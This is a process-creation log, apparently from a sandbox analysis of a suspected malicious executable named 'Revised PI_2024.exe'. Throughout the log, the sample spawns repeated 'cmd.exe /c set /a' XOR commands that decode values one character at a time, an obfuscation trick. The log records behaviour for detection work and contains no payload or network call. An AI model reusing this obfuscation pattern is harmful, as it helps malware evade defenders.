Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "193^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Users\user\Desktop\Revised PI_2024.exe "C:\Users\user\Desktop\Revised PI_2024.exe"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
